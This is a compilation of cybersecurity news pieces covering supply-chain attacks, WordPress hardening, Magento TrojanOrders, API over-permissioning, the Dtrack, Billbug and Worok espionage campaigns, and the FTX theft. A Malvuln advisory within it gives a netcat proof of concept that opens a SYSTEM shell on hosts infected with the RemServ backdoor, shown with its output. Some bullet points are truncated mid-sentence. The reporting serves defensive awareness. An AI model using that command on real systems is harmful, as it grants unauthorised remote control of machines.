With the proliferation of interconnected third-party applications, new strategies are needed to close the security gap.

Earlier this year, Gartner predicted that by 2025, 45% of organizations worldwide will have experienced attacks on their software supply chains — a three-fold increase from 2021. Not only are these attacks increasing, but the level at which they are penetrating systems and the techniques attackers are using are also new. Attackers are now taking advantage of access granted to third-party cloud services as a backdoor into companies' most sensitive core systems, as seen in recent high-profile attacks on Mailchimp, GitHub, and Microsoft. A new generation of supply chain attacks is emerging.

**Rise of App-to-App Integrations**

As the vast majority of the workforce has gone digital, organizations' core systems have been moving to the cloud. This accelerated cloud adoption has exponentially increased the use of third-party applications and the connections between systems and services, unleashing an entirely new cybersecurity challenge.

There are three main factors that lead to the rise in app-to-app connectivity:

*   **Product-led growth (PLG):** In an era of PLG and bottom-up software adoption, with software-as-a-service (SaaS) leaders like Okta and Slack
*   **DevOps:** Dev teams are freely generating and embedding API keys in
*   **Hyperautomation:** The rise of hyperautomation and low code/no code platforms means "citizen developers" can integrate and automate processes with the flip of a switch.

The vast scope of integrations are now easily accessible to any kind of team, which means time saved and increased productivity. But while this makes an organization's job easier, it blurs visibility into potentially vulnerable app connections, making it extremely difficult for organizational IT and security leaders to have insight into all of the integrations deployed in their environment, which expands the organization's digital supply chain.

**Third-Party Problems**

There is some acknowledgement of this problem: the National Institute of Standards and Technology (NIST) recently updated its guidelines for cybersecurity supply chain risk management. These new directives consider that as enterprises adopt more and more software to help run their business, they increasingly integrate third-party code into their software products to boost efficiency and productivity. While this is great recognition, there is another whole ecosystem of supply chain dependencies related to the mass amount of integrations of core systems with third-party applications that is being overlooked.

For companies whose internal processes are irreversibly hyperconnected, all it takes is an attacker spotting the weakest link within connected apps or services to compromise the entire system.

Businesses have to determine how best to manage this kind of scenario. What level of data are these apps gaining access to? What kind of permissions will this app have? Is the app being used, and what is the activity like?

Understanding the layers in which these integrations operate can help security teams pinpoint their potential attack areas. Some forward-looking chief information security officers (CISOs) are aware of the problem but only seeing a fraction of the challenge. In the era of product-led growth and bottom-up software adoption, it's difficult to have visibility into all the integrations between an organization's cloud applications, as the average enterprise uses 1,400 cloud services.

**Closing the Security Gap**

The risks of digital supply chain attacks are no longer confined to core business applications or engineering platforms — these vulnerabilities have now expanded with the proliferating web of interconnected third-party applications, integrations, and services. Only new governance and security strategies will close this expanding security gap.

There needs to be a paradigm shift within the market to protect this sprawling attack surface. In doing so, the following would need to be addressed:

*   **Visibility into all app-to-app connections:**Security teams need a clear line of sight not only into systems that connect to sensitive assets, but into
*   **Threat detection:**The nature of every integration — not just the standalone applications — need to be evaluated for risk level and exposure (e.g., redundant access, excessive permissions).
*   **Remediation strategies**_:_ Threat prevention strategies cannot be a one-size-fits-all affair. Security professionals need contextual mitigations that acknowledge the complex range of interconnected apps that comprise the attack surface.
*   **Automatic, zero-trust enforcement:**Security teams must be able to set and enforce policy guardrails around app-layer access (e.g., permission levels, authentication protocols).

The good news is that we are starting to see a shift in the industry's mindset. Some businesses are already taking the initiative and putting processes in place to stay ahead of a potential service supply chain attack — like HubSpot, which just released a message to help eliminate potential risks associated with the use of API keys. GitHub also recently introduced a fine-grained personal access token that offers enhanced security to developers and organization owners to reduce the risk to data of compromised tokens.

Ultimately, the digital world in which we live is only going to become more hyperconnected. In parallel, the industry needs to further its understanding and knowledge of these potential threats within the supply chain, before they cascade into more headline-making attacks.

The Next Generation of Supply Chain Attacks Is Here to Stay

By Waqas
The most prominent CMS today is WordPress which is being used by over 455 million across the globe.
This is a post from HackRead.com Read the original post: Step-by-Step Security Guide for WordPress

As the internet becomes increasingly integral to daily life, website security is more important than ever. Hackers can gain access to sensitive information, like credit card numbers and social security numbers, through websites with weak security. This can lead to identity theft and financial fraud.

Your website’s CMS (content management system) works as the backbone of your entire setup. The most prominent CMS today is WordPress which is being used by over 455 million across the globe. Naturally, WordPress is a lucrative target for cybercriminals and highlights the fact why WordPress security should never be ignored.

WordPress or another other CMS, while 100% security may be a myth, there are a few things you can do to ensure your website is secure from external and internal threats.

**Secure Hosting**

A website is a powerful tool that can help businesses of all sizes reach new customers and grow. However, a website is only as secure as the hosting provider that it uses. That’s why it’s important to choose a secure website hosting provider when setting up your website. Here are two things to look for in a secure website hosting provider:

**1. Industry-Leading Security Measures:** A good web hosting provider will have industry-leading security measures in place to protect your website from hackers and other online threats. This includes things like firewalls, DDoS protection, and malware scanning.

**2. Regular Backups:** In the event that your website is hacked or compromised, regular backups will ensure that you can quickly restore your site to its previous state. A good web hosting provider will perform regular backups of your site automatically.

**Strengthening Login Credentials**

According to studies, around 8 percent of hacked WordPress websites are due to weak passwords. However, as the largest self-hosted blogging tool in the world, WordPress has a responsibility to its users to keep their information safe. One way it does this is by natively offering two-factor authentication (2FA).

Two-factor authentication is an extra layer of security that requires not only a username and password but also something that the user has on them, like a phone. This makes it much harder for someone to hack into a WordPress account, even if they have the login credentials.

WordPress offers 2FA through several different methods, including SMS text messages, email, and authenticator apps. Which method you choose is up to you, but we recommend using an authenticator app like Authy or Google Authenticator.

**Updated Plugins**

The reason why WordPress powers millions of websites and blogs is its user-friendliness and free plugins. Although WordPress is good at adding new features and constantly issues security patches, zero-day vulnerabilities can be a calamity.

Therefore, always keep your plugins up to date because newer versions of plugins often fix security vulnerabilities that older versions had. Outdated plugins can cause compatibility issues with other plugins or with WordPress itself.

Additionally, newer versions of plugins usually have new features and improvements that can make your site run better. So next time you see a plugin update available, don’t ignore it – go ahead and update!

**Hiding WordPress Login URL**

There are a few reasons webmasters might want to change the default WordPress login URL. By doing so, you can help keep your site more secure from hackers and bots who try to gain access by brute force. Additionally, it can also deter casual users from trying to snoop around areas of your site they shouldn’t be.

If you’re running a membership site or online community, you may also want to change the login URL to something more branded and memorable for your users. By making it easy for them to find and login, you can reduce frustration and increase adoption.

Whatever your reason for wanting to change the WordPress login URL, it’s actually quite easy to do. There are a few different methods you can use, including plugins and editing code directly.

**Login Limit Plugin**

As a website owner, it’s important to make sure that your site is secure. One way to do this is by using a WordPress login limit plugin. This type of plugin will help to protect your site by limiting the number of failed login attempts.

There are many benefits of using a WordPress login limit plugin. By limiting the number of failed login attempts, you can help to prevent hackers from gaining access to your site. Additionally, this plugin can also help to improve the security of your password.

If you’re looking for a way to improve the security of your website, then we recommend that you consider using a WordPress login limit plugin.

**Security Plugins**

Using a security plugin is a must. There are many security plugins available for WordPress, but not all of them are created equal. Do some research and find a plugin that suits your needs. (We recommend looking into Wordfence or Sucuri.)

Once you’ve found a plugin, install it and activate it. Follow the instructions on the plugin’s settings page to configure it properly.

Most security plugins will offer features like blocking IP addresses, two-factor authentication, malware scanning, and more. Choose the features that are most important to you and make sure they’re enabled.

Keep your security plugin up to date by installing new versions when they’re released.

**Sharing Admin Access**

If you’re planning on giving someone else access to your WordPress admin panel, there are a few security precautions you should take first.

For starters, be sure to create a separate user account for the person to whom you’re granting access. That way, if their account is ever compromised, your main admin account will remain safe.

Next, be sure to set strong passwords for both your main admin account and the new user account. Use a combination of letters, numbers, and symbols to make it as difficult as possible for hackers to guess.

**Take Away**

Malicious actors are continuously coming up with new ways to use a company’s online presence against them, while cyber security specialists are always coming up with new ways to resist them.

This is the never-ending cycle of cybersecurity, and we’re all trapped in its center. Your WordPress site is just like any other website on the internet when it comes to cyber-attacks. However, by following the above-recommended tips and hacks, you can secure your WordPress website from cyber criminals or at least reduce the risk of being attacked. 

1.  What is WooCommerce, and Why You Should Care
2.  Tips for Using Uploader Widgets on WordPress Blogs
3.  5 WordPress Security Solutions with Free SSL Certificates
4.  Flaws in 2 famous WordPress plugins put millions of sites at risk
5.  WordPress GDPR Compliance plugin hacked to spread backdoor

Step-by-Step Security Guide for WordPress

By Deeba Ahmed
According to researchers, at least seven magecart groups are targeting Magento 2 websites in TrojanOrders attacks.
This is a post from HackRead.com Read the original post: TrojanOrders Attack Hits Magento and Adobe Stores

Sansec, a vulnerability detection, and website security firm, has warned about a spike in cyberattacks exploiting a critical mail template vulnerability tracked as CVE-2022-24086, with a CVSS score of 9.8. The researchers have dubbed the attack as TrojanOrders.

This flaw affects Magento and Adobe Commerce stores. Adobe released emergency patches for this flaw in February 2022 and warned e-commerce stores’ administrators and owners that the flaw was being exploited in the wild.

Later, Adobe confirmed that the patches it released were bypassed, and a new CVE identifier was assigned to the flaw (CVE-2022-24087).

**Researchers Observe a Rise in TrojanOrders Attacks**

According to Sansec, at least seven magecart groups are targeting Magento 2 websites in TrojanOrders attacks, exploiting the same vulnerability. It lets the attacker compromise vulnerable servers.

Sansec researchers have warned that around 40% of Magento 2 websites are targeted in these attacks. In fact, the company believes that hacking groups are at daggers drawn to gain control of the affected website. This trend is likely to continue now that online shops are expecting a rise in visitors due to Christmas.

**How does the Attack Works?**

The attacker injects malicious JavaScript code into an e-commerce website to disrupt the business. It can also lead to customer credit card theft. If such an activity is carried out on a busy day such as Black Friday or Cyber Monday, it can cause extensive damage.

The vulnerability is an improper input validation flaw in the checkout mechanism that can be exploited without authentication to achieve arbitrary code execution.

Attackers first analyze the Adobe Commerce and Magento stores to trigger the system. They send an email with one field having the exploit code. These triggers may be an order placement, customer registration, or sharing a wishlist.

If the trigger is successful, attackers try to gain control of the infected site and install a RAT (remote access trojan) to retain permanent access even when the system is patched. Usually, the backdoor is hidden in the health\_check.php file. Sansec identified seven attack vectors targeting this vulnerability.

> “Seven attack vectors means at least seven Magecart groups now actively trying TrojanOrders on Magento 2 websites. Developing an attack route is difficult and expensive. Once a group has a working exploit (attack vector), they keep on using it unless it ceases to be effective.”
> 
> Sansec

In their blog post, researchers wanted that even though fixes were released around nine months back, one-third of Magento sites and e-commerce stores haven’t yet applied them, so these could be vulnerable to TrojanOrders attacks.

1.  100s of schools at risk after Magecart attack on Wisepay
2.  Hackers steal credit card data of 14,579 BevMo customers
3.  Lazarus use Magecart attack to steal card data from EU, US sites
4.  Magecart hackers launched largest attack against Magento stores
5.  How to check for sites hacked to run web skimming, magecart attack

TrojanOrders Attack Hits Magento and Adobe Stores

Stop chatty apps from oversharing and eliminate a hacker backdoor — train developers on "security first" while subjecting APIs to least-privilege zero-trust policies.

We are more connected than ever — but far less so now than we will be: There will be 3.6 network devices for every living person in the world by 2023, up from 2.4 per person in 2018, according to the Cisco Annual Internet Report. The number of networked devices will rise from 18.4 billion to 29.3 billion within that time. The number of machine-to-machine (M2M) connections will increase from just over 6 billion to 14.7 billion.

As a result, we will grow only more reliant on software to make everything work. The performance of application programming interfaces (APIs) greatly affects software's overall effectiveness. Whether we're online seeking a weather update, participating in an industry webinar, sharing docs with colleagues, or calling up medical lab test results, APIs enable two software components to talk to each other to both make user requests and respond to them.

But, in this case, it's possible to have _too_ much talking between APIs which, like gossipy chatterbox co-workers in our offices, will overshare "too much information" if we let them. We call this "TMI tech."

By design, APIs open the floodgates for communication between apps. When the risk-mitigation measures of their access control are lax, APIs will reveal too much information or — even worse — expose themselves through a vulnerable app backdoor. Too often, developers over-permission APIs for functions so they don't have to keep changing access rights with every program build. However, attackers are well aware that this is happening, so they take over APIs and leverage their powerful permissions to breach networks.

As a result, oversharing APIs are emerging as frequently targeted, low-hanging fruit: The Salt Security State of API Security Report indicates that one-fifth of organizations have experienced a breach due to compromised APIs. Malicious traffic accounts for 2.1% of all API traffic, growing from an average of 12.22 million malicious calls per month to 26.46 million calls. The Open Web Application Security Project (OWASP) lists broken access control as the top Web application risk — over cryptographic failures, injections, and misconfigurations.

**Recommended Best Practices**

So, how do security leaders and their teams avoid these issues? We recommend the following best practices:

*   **Upskill developers to cultivate a "security first" culture.** It's critical to educate developers about the nuances that differentiate a poor coding pattern from a good one, to help them focus on building safe software from the start. When security teams strengthen their communications and relationships with developers, those developers learn how to use the right tools for protection and even maximize their value. Hands-on/person-to-person training proves essential here. Computer-based training by itself comes with too many limitations, often lacking the ability to verify the security skills of participants.
*   **Practice real-life scenarios.** All training programs must include this. Developers benefit the most by experiencing the real-world scenarios and consequences of broken access control – it's the most potent way to both verify and improve skills.
*   **Extend zero trust (ZT) to APIs.** We typically consider ZT in terms of user access. But we should apply it to APIs as well to eliminate over-permissioning and enforce role-based controls. If an API is supposed to perform a specific function, then security teams must work with developers to restrict permissions to solely that function.
*   **Contain API "phone privileges."** In further incorporating ZT, security/developer teams should limit the calls APIs are allowed to make, so these calls are strictly conducted based upon context-centered requests. Subsequently, attackers will encounter difficulties in modifying them for criminal purposes.

**Training Is Key**

Whether dealing with real people or software, we should take oversharing seriously. Those gossipy chatterbox co-workers could cause very real damage in the office, after all, which is why HR needs to sit down with them to firmly enforce what is appropriate to discuss and what is not. In the same office, we don't allow Sara from accounting to snoop around freely in the legal department and download whatever documents she wants.

Similarly, we have to train developers on "security first" while subjecting APIs to least-privilege ZT policies. With this, software will share only what is necessary to perform set tasks, and the elimination of TMI tech will firmly seal off our office "door" — and the network and all digital assets — from attackers.

TMI Tech: How to Stop Vulnerable Software from 'Oversharing'

Hackers tied to the North Korean government have been observed using an updated version of a backdoor known as Dtrack targeting a wide range of industries in Germany, Brazil, India, Italy, Mexico, Switzerland, Saudi Arabia, Turkey and the U.S.
"Dtrack allows criminals to upload, download, start or delete files on the victim host," Kaspersky researchers Konstantin Zykov and Jornt van der Wiel

Hackers tied to the North Korean government have been observed using an updated version of a backdoor known as Dtrack targeting a wide range of industries in Germany, Brazil, India, Italy, Mexico, Switzerland, Saudi Arabia, Turkey and the U.S.

"Dtrack allows criminals to upload, download, start or delete files on the victim host," Kaspersky researchers Konstantin Zykov and Jornt van der Wiel said in a report.

The victimology patterns indicate an expansion to Europe and Latin America. Sectors targeted by the malware are education, chemical manufacturing, governmental research centers and policy institutes, IT service providers, utility providers, and telecommunication firms.

Dtrack, also called Valefor and Preft, is the handiwork of Andariel, a subgroup of the Lazarus nation-state threat actor that's publicly tracked by the broader cybersecurity community using the monikers Operation Troy, Silent Chollima, and Stonefly.

Discovered in September 2019, the malware has been previously deployed in a cyber attack aimed at a nuclear power plant in India, with more recent intrusions using Dtrack as part of Maui ransomware attacks.

Industrial cybersecurity company Dragos attributed the nuclear facility attack to a threat actor it calls WASSONITE, pointing out the use of Dtrack for remote access to the compromised network.

The latest changes observed by Kaspersky relate to how the implant conceals its presence within a seemingly legitimate program ("NvContainer.exe" or "XColorHexagonCtrlTest.exe") and the use of three layers of encryption and obfuscation designed to make analysis more difficult.

The final payload, upon decryption, is subsequently injected into the Windows File Explorer process ("explorer.exe") using a technique called process hollowing. Chief among the modules downloaded through Dtrack is a keylogger as well as tools to capture screenshots and gather system information.

"The Dtrack backdoor continues to be used actively by the Lazarus group," the researchers concluded. "Modifications in the way the malware is packed show that Lazarus still sees Dtrack as an important asset."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Hackers Targeting Europe and Latin America with Updated DTrack Backdoor

Access to digital certificates would allow the Chinese-speaking espionage group to sign its custom malware and skate by security scanners.

The state-sponsored cyberattack group known as Billbug managed to compromise a digital certificate authority (CA) as part of an wide-ranging espionage campaign that stretched back to March — a concerning development in the advanced persistent threat (APT) playbook, researchers warn.

Digital certificates are files that are used to sign software as valid, and verify the identity of a device or user to enable encrypted connections. As such, a CA compromise could lead to a legion of stealthy follow-on attacks.

"The targeting of a certificate authority is notable, as if the attackers were able to successfully compromise it to access certificates, they could potentially use them to sign malware with a valid certificate, and help it avoid detection on victim machines," according to a report this week from Symantec. "It could also potentially use compromised certificates to intercept HTTPS traffic."

"This is potentially very dangerous," the researchers noted.

Others concur. 

“Certificate authorities are one of the most important elements of maintaining security in today’s digital world," Chris Hickman, CSO at Keyfactor, tells Dark Reading. "Much like a driver’s license or passport, digital certificates contain information about an individual or entity and are used to verify the authenticity of websites, devices, or organizations, ensuring an individual user that the entity that they’re communicating with online can be trusted. Think of this as the difference between issuing a real ID rather than a fake one — real IDs will always have some characteristics that cannot be replicated in a fake ID. The same holds true with certificates, which is why this dangerous.”

**An Ongoing Spate of Cyber-Compromises**

Billbug (aka Lotus Blossom or Thrip) is a China-based espionage group that mainly targets victims in Southeast Asia. It's known for big-game hunting — i.e., going after the secrets held by military organizations, governmental entities, and communications providers. Sometimes it casts a broader net, hinting at darker motivations: In one past instance, it infiltrated an aerospace operator to infect the computers that monitor and control the movements of satellites.

In the latest run of nefarious activity, the APT hit a pantheon of government and defense agencies throughout Asia, in one case infesting "a large number of machines" on a government network with its custom malware.

"This campaign was ongoing from at least March 2022 to September 2022, and it is possible this activity may be ongoing," says Brigid O Gorman, senior intelligence analyst at Symantec Threat Hunter Team. "Billbug is a long-established threat group that has carried out multiple campaigns over the years. It is possible that this activity could extend to additional organizations or geographies, though Symantec has no evidence of that at the moment."

**A Familiar Approach to Cyberattacks**

At those targets as well as at the CA, the initial access vector has been the exploitation of vulnerable, public-facing applications. After gaining the ability to execute code, the threat actors go on to install their known, custom Hannotog or Sagerunex backdoors before burrowing deeper into networks.

For the later kill-chain stages, Billbug attackers use multiple living-off-the-land binaries (LoLBins), such as AdFind, Certutil, NBTscan, Ping, Port Scanner, Route, Tracert, Winmail, and WinRAR, according to Symantec's report.

These legitimate tools can be abused for various doppelganger uses, such as querying Active Directory to map a network, ZIP-ing files for exfiltration, uncovering paths between endpoints, scanning NetBIOS and ports, and installing browser root certificates — not to mention downloading additional malware.

The custom backdoors combined with dual-use tools is a familiar footprint, having been used by the APT in the past. But the lack of concern about public exposure is par for the course for the group.

"It's notable that Billbug appears to be undeterred by the possibility of having this activity attributed to it, with it reusing tools that have been linked to the group in the past," says Gorman.

She adds, "The group's heavy use of living off the land and dual-use tools is also notable, and underlines the need for organizations to have in place security products that can not only detect malware, but can also recognize if legitimate tools are potentially being used in a suspicious or malicious manner."

Symantec has notified the unnamed CA in question to inform it of the activity, but Gorman declined to offer further details as to its response or remediation efforts.

While there's no indication so far that the group was able to go on to compromise actual digital certificates, the researcher advises, "Enterprises should be aware that malware could be signed with valid certificates if threat actors are able to achieve access to cert authorities."

In general, organizations should adopt a defense-in-depth strategy, using multiple detection, protection, and hardening technologies to mitigate risk at each point of a potential attack chain, she says.

"Symantec would also advise implementing proper audit and control of administrative account usage," Gorman notes. "We'd also suggest creating profiles of usage for admin tools as many of these tools are used by attackers to move laterally undetected through a network. Across the board, multifactor authentication (MFA) can help limit the usefulness of compromised credentials."

China-Based Billbug APT Infiltrates Certificate Authority

A suspected Chinese state-sponsored actor breached a digital certificate authority as well as government and defense agencies located in different countries in Asia as part of an ongoing campaign since at least March 2022.
Symantec, by Broadcom Software, linked the attacks to an adversarial group it tracks under the name Billbug, citing the use of tools previously attributed to this actor. The

A suspected Chinese state-sponsored actor breached a digital certificate authority as well as government and defense agencies located in different countries in Asia as part of an ongoing campaign since at least March 2022.

Symantec, by Broadcom Software, linked the attacks to an adversarial group it tracks under the name **Billbug**, citing the use of tools previously attributed to this actor. The activity appears to be driven by espionage and data-theft, although no data is said to have been stolen to date.

Billbug, also called Bronze Elgin, Lotus Blossom, Lotus Panda, Spring Dragon, and Thrip, is an advanced persistent threat (APT) group that is believed to operate on behalf of Chinese interests. Primary targets include government and military organizations in South East Asia.

Attacks mounted by the adversary in 2019 involved the use of backdoors like Hannotog and Sagerunex, with the intrusions observed in Hong Kong, Macau, Indonesia, Malaysia, the Philippines, and Vietnam.

Both the implants are designed to grant persistent remote access to the victim network, even as the threat actor is known to deploy an information-stealer known as Catchamas in select cases to exfiltrate sensitive information.

"The targeting of a certificate authority is notable, as if the attackers were able to successfully compromise it to access certificates they could potentially use them to sign malware with a valid certificate, and help it avoid detection on victim machines," Symantec researchers said in a report shared with The Hacker News.

"It could also potentially use compromised certificates to intercept HTTPS traffic."

The cybersecurity company, however, noted that there is no evidence to indicate that Billbug was successful in compromising the digital certificates. The concerned authority, it said, was notified of the activity.

An analysis of the latest wave of attacks indicates that initial access is likely obtained through the exploitation of internet-facing applications, following which a combination of bespoke and living-off-the-land tools are employed to meet its operational goals.

This comprises utilities such as WinRAR, Ping, Traceroute, NBTscan, Certutil, in addition to a backdoor capable of downloading arbitrary files, gathering system information, and uploading encrypted data.

Also detected in the attacks were an open source multi-hop proxy tool called Stowaway and the Sagerunex malware, which is dropped on the machine via Hannotog. The backdoor, for its part, is equipped to run arbitrary commands, drop additional payloads, and siphon files of interest.

"The ability of this actor to compromise multiple victims at once indicates that this threat group remains a skilled and well-resourced operator that is capable of carrying out sustained and wide-ranging campaigns," the researchers concluded.

"Billbug also appears to be undeterred by the possibility of having this activity attributed to it, with it reusing tools that have been linked to the group in the past."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Say China State-backed Hackers Breached a Digital Certificate Authority

Backdoor.Win32.RemServ.d malware suffers from a remote command execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/05a082d441d9cf365749c0e1eb904c85.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.RemServ.dVulnerability: Unauthenticated Remote Command ExecutionFamily: RemServType: PE32MD5: 05a082d441d9cf365749c0e1eb904c85Vuln ID: MVID-2022-0655Disclosure: 11/11/2022Description: The malware creates a service "RSMSS" that runs as SYSTEM and listens on TCP port 26103. Remote attackers who can connect to an infected host will get back a shell as "nt authority\system".Exploit/PoC:C:\>nc64.exe x.x.x.x 26103Microsoft Windows [Version 10.0.16299.309](c) 2017 Microsoft Corporation. All rights reserved.C:\>whoamiwhoamint authority\systemC:\>net usernet userUser accounts for \\----------------------------------------------------------------------------Administrator            DefaultAccount           GuestVictim                   WDAGUtilityAccountThe command completed with one or more errors.Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.RemServ.d MVID-2022-0655 Remote Command Execution

A recently discovered cyber espionage group dubbed Worok has been found hiding malware in seemingly innocuous image files, corroborating a crucial link in the threat actor's infection chain.
Czech cybersecurity firm Avast said the purpose of the PNG files is to conceal a payload that's used to facilitate information theft.
"What is noteworthy is data collection from victims' machines using

A recently discovered cyber espionage group dubbed **Worok** has been found hiding malware in seemingly innocuous image files, corroborating a crucial link in the threat actor's infection chain.

Czech cybersecurity firm Avast said the purpose of the PNG files is to conceal a payload that's used to facilitate information theft.

"What is noteworthy is data collection from victims' machines using DropBox repository, as well as attackers using DropBox API for communication with the final stage," the company said.

The development comes a little over two months after ESET disclosed details of attacks carried out by Worok against high-profile companies and local governments located in Asia and Africa. Worok is believed to share tactical overlaps with a Chinese threat actor tracked as TA428.

The Slovak cybersecurity company also documented Worok's compromise sequence, which makes use of a C++-based loader called **CLRLoad** to pave the way for an unknown PowerShell script embedded within PNG images, a technique known as steganography.

That said, the initial attack vector remains unknown as yet, although certain intrusions have entailed the use of ProxyShell vulnerabilities in Microsoft Exchange Server to deploy the malware.

Avast's findings show that the adversarial collective makes use of DLL side-loading upon gaining initial access to execute the CLRLoad malware, but not before performing lateral movement across the infected environment.

PNGLoad, which is launched by CLRLoad (or alternatively another first-stage called PowHeartBeat), is said to come in two variants, each responsible for decoding the malicious code within the image to launch either a PowerShell script or a .NET C#-based payload.

The PowerShell script has continued to be elusive, although the cybersecurity company noted it was able to flag a few PNG files belonging to the second category that dispensed a steganographically embedded C# malware.

"At first glance, the PNG pictures look innocent, like a fluffy cloud," Avast said. "In this specific case, the PNG files are located in C:\\Program Files\\Internet Explorer, so the picture does not attract attention because Internet Explorer has a similar theme."

This new malware, dubbed DropBoxControl, is an information-stealing implant that uses a Dropbox account for command-and-control, enabling the threat actor to upload and download files to specific folders as well as run commands present in a certain file.

Some of the notable commands include the ability to execute arbitrary executables, download and upload data, delete and rename files, capture file information, sniff network communications, and exfiltrate system metadata.

Companies and government institutions in Cambodia, Vietnam, and Mexico are few of the prominent countries affected by DropBoxControl, Avast said, adding the authors of the malware are likely different from those behind CLRLoad and PNGLoad owing to "significantly different code quality of these payloads."

Regardless, the deployment of the third-stage implant as a tool to harvest files of interest clearly indicates the intelligence-gathering objectives of Worok, not to mention serves to illustrate an extension to its killchain.

"The prevalence of Worok's tools in the wild is low, so it can indicate that the toolset is an APT project focusing on high-profile entities in private and public sectors in Asia, Africa, and North America," the researchers concluded.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Worok Hackers Abuse Dropbox API to Exfiltrate Data via Backdoor Hidden in Images

Mysterious crooks took hundreds of millions of dollars from FTX just as it collapsed. Crypto-tracing blockchain analysis may provide an answer.

Cryptocurrency has always offered a strange mix of temptations and challenges for anyone trying to steal it. As digital cash, held in multibillion-dollar sums on hackable, internet-connected networks, it presents a lucrative target. But once it's stolen, the blockchains that almost every cryptocurrency is built on make it possible to follow that money's every movement and, very often, to identify the thieves. So after a massive heist pulled nearly half a billion dollars worth of funds out of the already collapsing FTX cryptocurrency exchange yesterday, the world's crypto tracers are now closely tracking where that loot ends up—and looking for any clues that reveal the thief to be an FTX insider or just an opportunistic hacker.

On Friday, hours after the major cryptocurrency exchange FTX had filed for bankruptcy in the wake of its epic, 10-figure collapse, FTX's remaining funds were drained of more than $663 million worth of cryptocurrency, much of which appears to have been stolen. "FTX has been hacked," wrote an administrator in FTX's Telegram channel. "FTX apps are malware. Delete them." Exactly how FTX might have been breached—and whether its apps are, in fact, compromised—is far from clear, and FTX hasn't officially announced any theft. But the company's US general counsel wrote in a tweet that "unauthorized access to certain assets has occurred." (FTX did not respond to WIRED's request for comment.)

Soon, crypto-tracing and blockchain analysis firm Elliptic revealed that the $663 million outflow seemed to be a combination of FTX's movement of coins into its own storage wallets and a mysterious theft. According to Elliptic, fully $477 million of the funds appear to have been stolen, though another crypto-tracing firm, TRM Labs, puts the number at $338 million. Twenty-four hours after the theft, most of that money had moved into just a handful of cryptocurrency addresses—where the entire cryptocurrency tracing industry, a vast community of amateur crypto sleuths, and no doubt law enforcement agencies around the globe are now all watching it with an unblinking gaze.

That observability, for the FTX funds and for other stashes of stolen crypto, presents a serious challenge for any thief trying to cash out their haul into traditional currency. In this case, where regulators and an army of aggrieved creditors are looking for any sign that FTX's staff or owners may themselves be the culprits, it could ultimately help confirm that insiders were responsible for the theft—or instead show that external hackers took advantage of the chaos at FTX to pull off a burglary.

"We’re definitely watching the movements of these funds," says Chris Janczewski, the head of investigations at TRM Labs and a former special agent at the IRS's criminal investigations division. "This potential thief has hundreds of millions of dollars. But it's like they went into a bank, took as much cash as they could carry, and then the dye packs went off. They've got all this money, but now everyone knows it's connected to this bank robbery. What can you actually do with it?"

According to Elliptic's analysis, at least $220 million of funds stolen in the form of a variety of cryptocurrencies were quickly traded through decentralized exchanges—trading platforms that allow users to swap coins without giving identifying information—to convert them into the cryptocurrencies Ethereum and Dai. But cashing out those coins and the rest of the stolen loot will likely require trading it on a centralized exchange, which almost always requires users to hand over identifying information. The thieves may try to put the money through a "mixing" service that launders the coins by blending them with those of other users. But crypto-tracing blockchain analysts have proven they can often defeat those mixers—particularly when users are feeding very large sums into them. And some mixers, like the Tornado Cash service that was sanctioned by the US Treasury in August, render cryptocurrency untouchable for many exchanges or vulnerable to seizure.

That means it will be very difficult for the thieves to abscond with their profits in a spendable form without being identified, says Michelle Lai, a cryptocurrency privacy advocate, investor, and consultant who says she's been tracking the movements of the stolen FTX funds with "morbid fascination." But the real question, Lai says, is whether identifying the thieves will offer any recourse: After all, many of the most prolific cryptocurrency thieves are Russians or North Koreans operating in non-extradition countries, beyond the reach of Western law enforcement. "It's not a question of whether they'll know who did it. It's whether it will be actionable," says Lai. "Whether they're on-shore."

In the meantime, Lai and many other crypto-watchers have been closely eyeing one Ethereum address that is currently holding around $192 million worth of the funds. The account has been sending small sums of Ethereum-based tokens—some of which appear to have little to no value—to a variety of exchange accounts, as well as Ethereum inventor Vitalik Buterin and Ukrainian cryptocurrency fundraiser accounts. But Lai guesses that these transactions are likely meant to simply complicate the picture for law enforcement or other observers before any real attempt to launder or cash out the money.

The pilfering of FTX—whether the theft totals $338 million or $477 million—hardly represents an unprecedented haul in the world of cryptocurrency crime. In the late-March hack of the Ronin bridge, a gaming cryptocurrency exchange, North Korean thieves took $540 million. And earlier this year, cryptocurrency tracing led to the bust of a New York couple accused of laundering $4.5 _billion_ in crypto.

But in the case of the high-profile FTX theft and the exchange's overall collapse, tracing the errant funds might help put to rest—or confirm—swirling suspicions that someone within FTX was responsible for the theft. The company's Bahamas-based CEO, Sam Bankman-Fried, who resigned Friday, lost virtually his entire $16 billion fortune in the collapse. According to an unconfirmed report from CoinTelegraph, he and two other FTX executives are "under supervision" in the Bahamas, preventing them from leaving the country. Reuters also reported late last week that Bankman-Fried possessed a "backdoor" that was built into FTX's compliance system, allowing him to withdraw funds without alerting others at the company.

Despite those suspicions, TRM Labs' Janczewski points out that the chaos of FTX's meltdown might have provided an opportunity for hackers to exploit panicked employees and trick them into, say, clicking on a phishing email. Or, as Michelle Lai notes, bankrupted insider employees might have collaborated with hackers as a means to recover some of their own lost assets.

